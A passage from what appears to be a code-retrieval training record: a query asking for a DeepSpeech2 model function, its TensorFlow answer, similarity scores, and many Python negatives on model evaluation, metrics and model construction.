fmt = \"d\"\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(\n j,\n i,\n format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\",\n )\n plt.title(\"Confusion Matrix\")\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n plt.show()\n\n # print metrics\n if metrics is not None:\n for metric in metrics:\n if isinstance(all_preds[0], list):\n print(\"{}: {}\".format(metric.__name__, np.mean([metric(labels, preds) for preds,labels in zip(all_preds, all_labels)])))\n else:\n print(\"{}: {}\".format(metric.__name__, metric(all_labels, all_preds)))\n\n\n self.model.train()", "def _evaluate_model(\n run_id: str, dataset_filename: str, dataset_sampling_column: str = None\n):\n fix_multiprocessing_with_keras_on_macos()\n\n run = _get_run(run_id)\n hyperparameters = run.config\n\n # no need to run this on a gpu since it's 1 epoch\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n with ModelBestH5File(run) as model_h5_filepath:\n model = _load_untrainable_model(hyperparameters, model_h5_filepath)\n\n model_name = run.config[\"model_name\"]\n x, y = _get_prepared_dataset(\n model_name, hyperparameters, dataset_filename, dataset_sampling_column\n )\n\n wandb.init(\n config={\n \"run_id\": run_id,\n \"dataset_filename\": dataset_filename,\n \"dataset_sampling_column\": dataset_sampling_column,\n },\n tags=[\"model-evaluation\"],\n )\n\n batch_size = hyperparameters[\"batch_size\"]\n label_scale_factor_mmhg = hyperparameters[\"label_scale_factor_mmhg\"]\n acceptable_error_mg_l = hyperparameters[\"acceptable_error_mg_l\"]\n acceptable_fraction_outside_error = hyperparameters[\n \"acceptable_fraction_outside_error\"\n ]\n\n # we're using fit() instead of evaluate() to get the functionality of these callbacks\n # training performance in the results should be ignored, as it can be affected by some\n # training-only layers such as dropout\n model.fit(\n x,\n y,\n batch_size=batch_size,\n epochs=1,\n verbose=2,\n validation_data=(x, y),\n callbacks=[\n ThresholdValMeanAbsoluteErrorOnCustomMetric(\n acceptable_fraction_outside_error=acceptable_fraction_outside_error,\n acceptable_error_mg_l=acceptable_error_mg_l,\n ),\n WandbCallback(verbose=1, monitor=\"val_adjusted_mean_absolute_error\"),\n LogPredictionsAndWeights(\n metric=\"val_adjusted_mean_absolute_error\",\n dataset=([], [], x, y),\n label_scale_factor_mmhg=label_scale_factor_mmhg,\n ),\n ],\n )\n\n # returning model and dataset for use in jupyter notebooks\n return model, (x, y)", "def evaluate(self, train_set=\"train_set\", test_set=\"test_set\", targets=\"targets\", k=10):\n\n test_set = self.cache.fetch(test_set) if isinstance(test_set, str) else test_set\n\n # Predict\n preds = self.run(dataset=train_set, targets=targets, k=k)\n\n # Evaluate model\n print(\"evaluating model ...\")\n score = evaluate(preds, test_set)\n print(\"MAP@{}: {:.5f}\\n\".format(k, score))\n\n return score", "def eval_perf_train(model, X_train=None, y_train=None):\n\n # if X_train != None and y_train != None:\n\n y_hat_train = model.predict(X_train)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f'Train Mean Absolute Error: {train_mae:,.2f}')\n print(f'Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n # if X_test != None and y_test != None:\n\n # y_hat_test = model.predict(X_test)\n\n # test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n # test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n # test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n # test_r = metrics.r2_score(y_test, y_hat_test)\n\n # print('Evaluating Performance on Testing Data:\\n')\n # print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n # print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n # print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n # print(f'Test R-Square Value: {round(test_r,2)}')", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def run_evaluate(self, test):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n for words, labels in minibatches(test, self.config.batch_size):\n labels_pred, sequence_lengths = self.predict_batch(words)\n\n for lab, lab_pred, length in zip(labels, labels_pred,\n sequence_lengths):\n lab = lab[:length]\n lab_pred = lab_pred[:length]\n accs += [a==b for (a, b) in zip(lab, lab_pred)]\n\n lab_chunks = set(get_chunks(lab, self.config.vocab_tags))\n lab_pred_chunks = set(get_chunks(lab_pred,\n self.config.vocab_tags))\n\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n\n return {\"acc\": 100*acc, \"f1\": 100*f1}", "def evaluate_model(sess, model, data_set):\n total_cost = 0.0\n total_r_cost = 0.0\n total_kl_cost = 0.0\n for batch in range(data_set.num_batches):\n unused_orig_x, x, s = data_set.get_batch(batch)\n feed = {model.input_data: x, model.sequence_lengths: s}\n (cost, r_cost,\n kl_cost) = sess.run([model.cost, model.r_cost, model.kl_cost], feed)\n total_cost += cost\n total_r_cost += r_cost\n total_kl_cost += kl_cost\n\n total_cost /= (data_set.num_batches)\n total_r_cost /= (data_set.num_batches)\n total_kl_cost /= (data_set.num_batches)\n return (total_cost, total_r_cost, total_kl_cost)", "def evaluate(model, data_pars=None, compute_pars=None, out_pars=None, **kw):\n ddict = {}\n \n return ddict", "def evaluate(self,X,Y):\n from sklearn import metrics\n Y_pred = [self.crf_model.tag(xseq) for xseq in X]\n lb = LabelBinarizer()\n y_true_combined = lb.fit_transform(list(chain.from_iterable(Y)))\n\n labels = list(lb.classes_)\n print(labels)\n # labels = list(self.crf_model.classes_)\n labels.remove('O')\n Y_pred_flat = [item for sublist in Y_pred for item in sublist]\n Y_flat = [item for sublist in Y for item in sublist]\n print(metrics.classification_report(Y_pred_flat, Y_flat,labels))", "def calculate_metrics(self):\n \n for cv in self.cat_vals:\n cat_inds = np.where(self.category_values == cv)[0]\n weighted_difference = (self.z[cat_inds]-self.mz[cat_inds])/self.weight_values[cat_inds]\n resid = np.sqrt(np.sum(np.square(weighted_difference))/(cat_inds.size))\n self.metric[str(cv)] = resid\n \n return self.metric", "def run_evaluate(self, test):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n for words, labels in minibatches(test, self.config.batch_size):\n labels_pred, sequence_lengths = self.predict_batch(words)\n\n for lab, lab_pred, length in zip(labels, labels_pred,\n sequence_lengths):\n lab = lab[:length]\n lab_pred = lab_pred[:length]\n accs += [a==b for (a, b) in zip(lab, lab_pred)]\n\n lab_chunks = set(get_chunks(lab, self.config.vocab_tags))\n lab_pred_chunks = set(get_chunks(lab_pred,\n self.config.vocab_tags))\n\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n print('*'*20, '\\n')\n print('precision:', p, 'recall:', r, 'f1:', f1, '\\n')\n print('*'*20)\n\n return {\"acc\": 100*acc, \"f1\": 100*f1}", "def evaluate(ner_model, examples):\n # The Scorer computes and stores evaluation scores\n scorer = Scorer()\n for text, annotations in examples:\n # Process the text to get entities predicted\n document = ner_model.make_doc(text)\n correct_annotations = GoldParse(document, entities=annotations['entities'])\n predicted_annotations = ner_model(text)\n # Update the evaluation scores from the document\n scorer.score(predicted_annotations, correct_annotations)\n return scorer.scores", "def evaluate(self):\n predictions = self.model.predict(self.test[0])\n accuracy = accuracy_score(self.test[1], predictions)\n print(\"Accuracy:\", str(accuracy * 100) + \"%\")\n self.plot_results(predictions)", "def eval_model(self, model):\n evaluation = model.evaluate(x=self.xt_test, y=self.yt_test)\n print(\"loss : \" + str(round(evaluation[0]*100, 2)) + \"%\")\n print(\"accuracy: \" + str(round(evaluation[1]*100, 2)) + \"%\")", "def test(model, queue, device):\n logger.info('test() start')\n total_dist = 0\n total_length = 0\n total_sent_num = 0\n time_step = 0\n\n model.eval()\n\n with torch.no_grad():\n while True:\n feats, targets, feat_lengths, script_lengths = queue.get()\n if feats.shape[0] == 0:\n break\n\n feats = feats.to(device)\n targets = targets.to(device)\n target = targets[:, 1:]\n\n model.flatten_parameters()\n y_hat, _ = model(feats, targets, teacher_forcing_ratio = 1.0, use_beam_search = False)\n dist, length = get_distance(target, y_hat, id2char, EOS_TOKEN)\n total_dist += dist\n total_length += length\n total_sent_num += target.size(0)\n if time_step % 10 == 0:\n logger.info('cer: {:.2f}'.format(dist / length))\n time_step += 1\n\n CER = total_dist / total_length\n logger.info('test() completed')\n\n return CER" ]
[ "0.61214685", "0.6103847", "0.6043671", "0.59896857", "0.5839277", "0.5747045", "0.5735802", "0.5731427", "0.57268673", "0.5685036", "0.56741154", "0.56643283", "0.5655421", "0.565319", "0.56433403", "0.56417257", "0.56286067", "0.56258726", "0.56154364", "0.5613228", "0.5611205", "0.5610551", "0.5604053", "0.5603191", "0.5548799", "0.5540959", "0.55302536", "0.5521474", "0.5518882", "0.551811", "0.5517933", "0.551386", "0.55014735", "0.5488437", "0.548814", "0.5484374", "0.54736936", "0.5457942", "0.5445424", "0.5445124", "0.5440153", "0.5430675", "0.5418318", "0.5411879", "0.5407843", "0.54039484", "0.5401198", "0.5386371", "0.53851897", "0.5379692", "0.53772146", "0.53677565", "0.5364756", "0.536257", "0.5353945", "0.53522587", "0.535129", "0.5349366", "0.5345418", "0.5344146", "0.53404516", "0.5331169", "0.5329892", "0.53291", "0.53161365", "0.531511", "0.5313613", "0.53113276", "0.53102356", "0.53081834", "0.5305271", "0.5301433", "0.5298375", "0.52977234", "0.52949786", "0.5294748", "0.5294527", "0.5293006", "0.5293006", "0.529124", "0.52861935", "0.5284614", "0.52817905", "0.52813786", "0.52808064", "0.5280238", "0.5263137", "0.5262241", "0.5259468", "0.5259468", "0.5259365", "0.52543616", "0.52492326", "0.524832", "0.52480745", "0.5246349", "0.5245682", "0.5243406", "0.52384496", "0.5235308" ]
0.5991093
3
Define model function for deep speech model.
def model_fn(features: Dict, labels, mode, params: Dict): global FLAGS num_classes = params["num_classes"] input_length = features["input_length"] label_length = features["label_length"] features = features["features"] # Create model model = deep_speech_model.DeepSpeech2( num_rnn_layers=FLAGS.rnn_hidden_layers, rnn_type=FLAGS.rnn_type, is_bidirectional=FLAGS.is_bidirectional, rnn_hidden_size=FLAGS.rnn_hidden_size, num_classes=num_classes, use_bias=FLAGS.use_bias) # predict mode if mode == es.ModeKeys.PREDICT: logits = model(features, training=False) predictions = { "logits": logits, "classes": tf.argmax(logits, axis=2), "probabilities": tf.nn.softmax(logits) } return es.EstimatorSpec(mode=mode, predictions=predictions) # train / eval mode logits = model(features, training=True) probs = tf.nn.softmax(logits) ctc_input_length = compute_length_after_conv(tf.shape(features)[1], tf.shape(probs)[1], input_length) loss = tf.reduce_mean( ctc_loss(label_length=label_length, ctc_input_length=ctc_input_length, labels=labels, probs=probs)) opt = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) global_step = tf.train.get_or_create_global_step() minimize_op = opt.minimize(loss, global_step=global_step) update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) train_op = tf.group(minimize_op, update_ops) return es.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_model_fn(self):", "def build_model():", "def model_fn(self, features, labels, mode, params, config):\n raise NotImplementedError()", "def load_deepspeech(model_name):\n\n # For reference:\n # from deepspeech_pytorch.model import DeepSpeech\n # from torch.utils.model_zoo import load_url\n # import torch.onnx\n\n # pretrained_url = 'https://github.com/SeanNaren/deepspeech.pytorch/releases/download/v2.0/an4_pretrained_v2.pth'\n # params = load_url(pretrained_url)\n # model = DeepSpeech.load_model_package(params)\n # model.eval()\n # input_sizes = (1, 1, 161, 753)\n # input_data = torch.randn(*input_sizes).float()\n # input_sizes = torch.IntTensor([161]).int()\n # model(input_data, input_sizes)\n # return model, [input_data, input_sizes]\n\n raise NotImplementedError(\"TVM pytorch frontend doesn't support all the required \"\n \"operators for this model.\")", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def build_model(self):\n doc_input = Input(shape=(self.max_sent_num ,self.max_sent_length,512), dtype='float32')\n doc_in=Flatten()(doc_input)\n \n #masked3=Masking(mask_value=Special_value)(doc_input)\n \n # self.model_sent = self.build_sent_encoder()\n \n # doc_encoder= TimeDistributed(self.model_sent)(doc_in)\n \n # document_att= self.build_doc_encoder(doc_encoder)\n dense= Dense(DENSE_SIZE,activation='softmax')(doc_in)\n #doc_att = self.build_sent_encoder(sent_encoder)\n # dense the output to 2 because the result is a binary classification.\n output_tensor = Dense(3, activation='softmax', name='classification')(dense)\n # Create Sentence-level Model\n self.model = Model(doc_input, output_tensor)", "def build_model(self) -> nn.Module:\n pass", "def __init__(self, params, model, name=\"ds2_encoder\", mode='train'):\n super(DeepSpeech2Encoder, self).__init__(params, model, name, mode)", "def speech_recog(event, context):\n \n \n try:\n\n DEVICE=torch.device('cpu')\n model = SpeechRNN()\n model = model.to(DEVICE)\n model.load_state_dict(torch.load('weights_cpu_voicerec.pt', map_location=DEVICE))\n\n wav_file = random.choice(sample_file_list)\n waveform,_ = torchaudio.load(wav_file, normalization=True)\n \n # if the waveform is too short (less than 1 second) we pad it with zeroes\n if waveform.shape[1] < 16000:\n waveform = F.pad(input=waveform, pad=(0, 16000 - waveform.shape[1]), mode='constant', value=0)\n \n mfcc_transform = torchaudio.transforms.MFCC(n_mfcc=12, log_mels=True)\n mfcc = mfcc_transform(waveform).squeeze(0).transpose(0,1)\n x = mfcc.unsqueeze(0)\n\n model.eval()\n y = model(x)\n predicted_label = classes[y.max(1)[1].numpy().item()]\n\n input_text = wav_file.split(\"/\")[-1]\n output = f'Prediction of input file {wav_file.split(\"/\")[-1]} is {predicted_label}.'\n\n fields = {'input': input_text,\n 'predicted': output}\n\n return {\"statusCode\": 200, \"headers\": headers, \"body\": json.dumps(fields)}\n\n except ValueError as ve:\n # logger.exception(ve)\n print(ve)\n return {\n \"statusCode\": 422,\n \"headers\": headers,\n \"body\": json.dumps({\"error\": repr(ve)}),\n }\n except Exception as e:\n # logger.exception(e)\n print(e)\n return {\n \"statusCode\": 500,\n \"headers\": headers,\n \"body\": json.dumps({\"error\": repr(e)}),\n }", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model_extract_document_embedding(self):\n input_ids = tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"ids\")\n attention_mask = tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"att\")\n token = tf.keras.layers.Input(shape=(self.maxlen,), dtype=tf.int32, name=\"tok\")\n\n # Embedding :\n if self.method_embedding == 'CamemBERT':\n Camembert_model = transformers.TFCamembertModel.from_pretrained(\"jplu/tf-camembert-base\")\n x = Camembert_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'FlauBERT':\n # lr = 0.00001\n Flaubert_model = transformers.TFFlaubertModel.from_pretrained(\"jplu/tf-flaubert-base-uncased\")\n x = Flaubert_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'XLM-RoBERTa':\n # lr = 0.00001\n XLMRoBERTa_model = transformers.TFXLMRobertaModel.from_pretrained(\"jplu/tf-xlm-roberta-base\")\n x = XLMRoBERTa_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'RoBERTa':\n # Experience Test path weights :\n PATH = '/kaggle/input/tf-roberta/'\n config = transformers.RobertaConfig.from_pretrained(PATH + 'config-roberta-base.json')\n Roberta_model = transformers.TFRobertaModel.from_pretrained(PATH + 'pretrained-roberta-base.h5',\n config=config)\n # Sinon :\n # Roberta_model = transformers.TFRobertaModel.from_pretrained('roberta-base')\n x = Roberta_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n elif self.method_embedding == 'BERT':\n BERT_model = transformers.TFBertModel.from_pretrained('bert-base-uncased')\n x = BERT_model(input_ids, attention_mask=attention_mask, token_type_ids=token)\n else:\n logger.critical(\"unknown embedding method name : '{}'\".format(self.method_embedding))\n\n # word vectors shape : (None, maxlen, 768)\n x = x[0]\n cls_token = x[:, 0, :]\n\n model = tf.keras.models.Model(inputs=[input_ids, attention_mask, token], outputs=cls_token)\n return model", "def _model_fn(features, labels, mode, config):\n return _transformer_model_fn(\n features=features,\n labels=labels,\n mode=mode,\n head=head_lib._regression_head_with_mean_squared_error_loss(\n label_dimension=label_dimension,\n weight_column=weight_column,\n loss_reduction=loss_reduction),\n num_layers=num_layers,\n d_model=d_model,\n num_heads=num_heads,\n dff=dff,\n input_vocab_size=input_vocab_size,\n target_vocab_size=target_vocab_size,\n output_size=output_size,\n feature_columns=tuple(feature_columns or []),\n optimizer=optimizer,\n dropout=dropout,\n input_layer_partitioner=input_layer_partitioner,\n config=config,\n data_conf=data_conf)", "def model_fn(model_dir):\n model = models.resnet50(pretrained=True)\n\n _ = model.eval()\n\n modules=list(model.children())[:-1]\n model=nn.Sequential(*modules)\n for p in model.parameters():\n p.requires_grad = False\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else \"cpu\")\n\n model = model.to(device)\n\n return model", "def convert_to_model(self, *args):", "def model(input_shape, model,model2,model3, word_to_index):\n \n ### START CODE HERE ###\n # Define sentence_indices as the input of the graph.\n # It should be of shape input_shape and dtype 'int32' (as it contains indices, which are integers).\n sentence_indices = Input(input_shape,dtype='int32')\n \n # Create the embedding layer pretrained with GloVe Vectors (≈1 line)\n embedding_layer, ignored_words = pretrained_embedding_layer(model,model2,model3,word_to_index,300)\n \n # Propagate sentence_indices through your embedding layer\n # (See additional hints in the instructions).\n embeddings = embedding_layer(sentence_indices)\n \n # Propagate the embeddings through an LSTM layer with 128-dimensional hidden state\n # The returned output should be a batch of sequences.\n X = LSTM(units=128,input_shape=input_shape,return_sequences=True)(embeddings)\n # Add dropout with a probability of 0.5\n X = Dropout(rate=0.5)(X)\n # Propagate X trough another LSTM layer with 128-dimensional hidden state\n # The returned output should be a single hidden state, not a batch of sequences.\n X = LSTM(units=128,input_shape=input_shape,return_sequences=False)(X)\n # Add dropout with a probability of 0.5\n X = Dropout(rate=0.5)(X)\n # Propagate X through a Dense layer with 5 units\n X = Dense(units=num_classes)(X)\n# X = Dense(6, activation='softmax')\n # Add a softmax activation\n# print(X)\n# print(type(X))\n# print(X.shape)\n# print(sum(X))\n X = Activation('softmax')(X)\n \n # Create Model instance which converts sentence_indices into X.\n model = Model(inputs=sentence_indices,outputs=X)\n \n return model", "def dynamic_model(self, input_val: float) -> float:\n pass", "def _define_model_functions(self):\n # Input of neurons (Batch size x Number of states)\n states = Input(shape=(self.num_states,), dtype=tf.float32, name=\"states\")\n\n # Hidden layers\n layer_1 = layers.Dense(self.hidden_arch[0], activation=self.activation)(states)\n layers_n = [None for _ in range(len(self.hidden_arch))]\n layers_n[0] = layer_1\n for idx, n_neurons in enumerate(self.hidden_arch[1:]):\n layers_n[idx + 1] = layers.Dense(\n n_neurons,\n activation=self.activation,\n )(layers_n[idx])\n\n # Output of neurons is q(s, a) function\n q_s_a = layers.Dense(self.num_actions, name=\"q_s_a\")(layers_n[-1])\n\n # Get the model\n self.model = Model(inputs=states, outputs=q_s_a)\n\n # Loss function and optimizer\n self.loss = losses.MeanSquaredError(reduction=\"auto\", name=\"mean_squared_error\")\n\n self.optimizer = optimizers.Adam(\n learning_rate=self.learning_rate,\n beta_1=self.beta1,\n beta_2=self.beta2,\n name=\"Adam\",\n )", "def deep_model(model = 'luong', validate = True):\n return _softmax_class.deep_model(\n PATH_SENTIMENTS,\n S3_PATH_SENTIMENTS,\n 'sentiment',\n ['negative', 'positive'],\n model = model,\n validate = validate,\n )", "def _model(self):\n common_scale = self.edp_par['common_scale'].value\n model = self.F_trans() * self.F_cont()\n # get F(h=1,k=0), which is used for normalization \n # common_scale is a common scaling factor => F(h=1,k=0) = 100*common_scale\n F_10 = model[(self.h==1)&(self.k==0)]\n model = model / np.absolute(F_10) * 100 * common_scale\n return model", "def custom_model():\n\t# initialize the model\n\t# load weights from path\n\t# returns model\n\tmodel = mlp.get_training_model()\n\tmodel.load_state_dict(torch.load(\"model_wt.pth\"))\n\treturn model", "def getSentenceFormModel(self):", "def call(self, model):\n raise NotImplementedError('Define your score here')", "def __call__(self, model):\n\n result = self.relation(model)\n return 0.5 * result.T @ result", "def model_definition(self):\n pass", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def synthesize(self, model, mu = 1.0):\n ndim = len(model.shape)\n dtype = self._get_dtype()\n \n if(ndim == 1):\n model1 = np.ascontiguousarray(model.reshape((1,1,model.size)), dtype=dtype)\n elif(ndim == 3):\n model1 = model\n else:\n print(\"MilneEddington::synthesize: ERROR, the input model must have 1 or 3 dimensions\")\n return None\n\n if(model1.shape[2] != 9):\n print(\"MilneEddington::synthesize: ERROR, input model has npar={0}, should be 9\".format(model1.shape[2]))\n return None\n\n isContiguous = model1.flags['C_CONTIGUOUS']\n if(not isContiguous or model1.dtype != dtype):\n model1 = np.ascontiguousarray(model1, dtype=dtype)\n\n \n \n return self.Me.synthesize(model, mu=mu)", "def template_model():\n model_type = 'continuous' # either 'discrete' or 'continuous'\n model = do_mpc.model.Model(model_type)\n\n # Model variables:\n var1 = model.set_variable(var_type='_x', var_name='var1')\n var2 = model.set_variable(var_type='_x', var_name='var2')\n\n state = vertcat(var1,var2)\n state_dot = model.set_variable(var_type='_x', var_name='state_dot', shape=(2.1))\n\n input1 = model.set_variable(var_type='_u', var_name='input1')\n\n\n # Parameters:\n # define Parameters\n\n model.set_rhs('var1',state_dot[0])\n model.set_rhs('var2',state_dot[1])\n\n state_dot_rhs = vertcat(\n # rhs1,\n # rhs2)\n model.set_rhs('state_dot',state_dot_rhs)\n\n model.setup()\n\n return model", "def _train_model(self):\n raise NotImplementedError()", "def _trainedmodel(continuous, modelform, Vr, m=20):\n if continuous == \"inferred\":\n ModelClass = roi._core.InferredContinuousROM\n elif continuous:\n ModelClass = roi._core._ContinuousROM\n else:\n ModelClass = roi._core._DiscreteROM\n\n n,r = Vr.shape\n c, A, H, Hc, G, Gc, B = _get_operators(r, m)\n operators = {}\n if \"c\" in modelform:\n operators['c_'] = c\n if \"A\" in modelform:\n operators['A_'] = A\n if \"H\" in modelform:\n operators['Hc_'] = Hc\n if \"G\" in modelform:\n operators['Gc_'] = Gc\n if \"B\" in modelform:\n operators['B_'] = B\n\n model = roi._core.trained_model_from_operators(ModelClass, modelform,\n Vr, **operators)\n model.datacond_ = np.random.random()\n model.dataregcond_ = model.datacond_ / 2\n model.residual_ = np.random.random()\n model.misfit_ = model.residual_ / 2\n\n return model", "def setup_model(self) -> (nn.Module, int):", "def __call__(self, X):\n return self.model(X)", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def MakeModel(self):\n pass", "def create_model(window, input_shape, num_actions,\n model_name='q_network'):\n if model_name == 0:\n model = linear_model(window, input_shape, num_actions)\n elif model_name == 1:\n model = deep_model(window, input_shape, num_actions)\n elif model_name == 2:\n model = dueling_deep(window, input_shape, num_actions)\n else:\n print(\"No suitable models found.\")\n exit()\n print(model.summary())\n return model", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", "def masked_language_model(vocab, model, mask_prob=...):\n ...", "def get_model(model: str) -> Any:\n try:\n model_function = eval(model)\n except (NameError, AttributeError) as err:\n sys.exit(f'{err}. Accepted models from {tf}, {sm}, {tfa}, {tfc}')\n return model_function", "def create_model(args, pretrained_embedding: np.ndarray, model_name='deep_q_network', trainable=True):\n\n state = Input(shape=(args.n_features,))\n model = None\n\n n, m = pretrained_embedding.shape\n print('shape', pretrained_embedding.shape)\n embedded = Embedding(n, m, embeddings_initializer=keras.initializers.constant(pretrained_embedding))(state)\n\n if model_name == \"deep_q_network\":\n print(\"Building \" + model_name + \" ...\")\n\n # First convolutional layer\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n model = Model(inputs=state, outputs=y_pred)\n\n elif model_name == \"deep_q_network_double\":\n print(\"Building \" + model_name + \" ...\")\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n model = Model(input=state, output=y_pred)\n\n elif model_name == \"deep_q_network_duel\":\n print(\"Building \" + model_name + \" ...\")\n\n x = Dense(args.hidden_size, activation=K.relu)(embedded)\n x = Dropout(args.dropout)(x)\n x = Flatten()(x)\n\n y_pred = Dense(args.n_actions, trainable=trainable)(x)\n\n # value output\n x_val = Dense(args.hidden_size, trainable=trainable)(x)\n # x_val = Activation('relu')(x_val)\n y_val = Dense(1, trainable=trainable)(x_val)\n\n # advantage output\n x_advantage = Dense(args.hidden_size, trainable=trainable)(x)\n # x_advantage = Activation('relu')(x_advantage)\n y_advantage = Dense(args.n_actions, trainable=trainable)(x_advantage)\n # mean advantage\n y_advantage_mean = Lambda(lambda x: K.mean(x, axis=1, keepdims=True))(y_advantage)\n\n y_q = Lambda(lambda x: x[0] + x[1] - x[2])([y_val, y_advantage, y_advantage_mean])\n\n model = Model(input=state, output=y_q)\n\n else:\n print(\"Model not supported\")\n exit(1)\n\n return model", "def model_fn(model_dir):\n\n net = gluon.nn.SymbolBlock.imports('%s/model.json' % model_dir,\n ['data'], \n param_file='%s/model.params' % model_dir,\n ctx=mx.cpu())\n\n return net", "def define_model(model):\n global log_data_likelihood, log_priors, num_params, file_labels, labels, prior_xs, prior_pdfs\n num_prior_pts = 1001\n pic50_lower = -4.\n pic50_upper = 14.\n hill_lower = 0.\n hill_upper = 6.\n if model == 1:\n num_params = 2\n log_data_likelihood = log_data_likelihood_model_1_capped\n log_priors = log_priors_model_1\n labels = [r\"$pIC50$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0], loc=mu, scale=s),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower),[0,0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n st.gamma.pdf(prior_xs[1], sigma_shape, loc=sigma_loc, scale=sigma_scale)]\n elif model == 2:\n num_params = 3\n log_data_likelihood = log_data_likelihood_model_2_capped\n log_priors = log_priors_model_2\n labels = [r\"$pIC50$\", r\"$Hill$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','Hill','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(hill_lower, hill_upper, num_prior_pts),\n # 